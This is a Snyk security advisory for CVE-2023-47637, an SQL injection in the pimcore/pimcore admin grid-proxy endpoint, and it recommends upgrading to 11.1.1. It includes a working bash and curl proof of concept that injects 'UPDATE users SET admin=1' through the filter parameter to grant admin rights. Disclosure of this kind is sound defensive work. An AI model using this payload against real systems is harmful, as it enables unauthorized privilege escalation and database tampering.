SQL Injection Affecting pimcore/pimcore package, versions <11.1.1
Threat Intelligence
EPSS
0.07% (33rd
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-PIMCOREPIMCORE-6062173
- published 16 Nov 2023
- disclosed 15 Nov 2023
- credit Florian Märkl
Introduced: 15 Nov 2023
CVE-2023-47637 Open this link in a new tabHow to fix?
Upgrade pimcore/pimcore to version 11.1.1 or higher.
Overview
pimcore/pimcore is a content & product management framework (CMS/PIM/E-Commerce).
Affected versions of this package are vulnerable to SQL Injection via the /admin/object/grid-proxy endpoint. A user with Objects permission can execute arbitrary SQL statements by invoking Multiselect in the getFilterCondition() function, and escalate their privileges to admin.
PoC
#!/bin/bash
BASE_URL=http://localhost:8084 # REPLACE THIS!
CSRF_TOKEN="bd89fd7ceb3b541dd63c200fd4fc8c8ea3cc1a05" # REPLACE THIS!
COOKIE="PHPSESSID=a0f408f9af7657430a4e6a1608c80277" # REPLACE THIS!
SQL="UPDATE users SET admin=1"
FILTER_JSON="[{\"property\":\"tags\",\"operator\":\"=\",\"type\":\"list\",\"value\":[\"')); ${SQL}; --\"]}]"
curl "${BASE_URL}/admin/object/grid-proxy?classId=EV&folderId=1119" \
-X POST \
-H "X-pimcore-csrf-token: ${CSRF_TOKEN}" \
-H "Cookie: ${COOKIE}" \
--data "filter=$FILTER_JSON"
References
CVSS Scores
version 3.1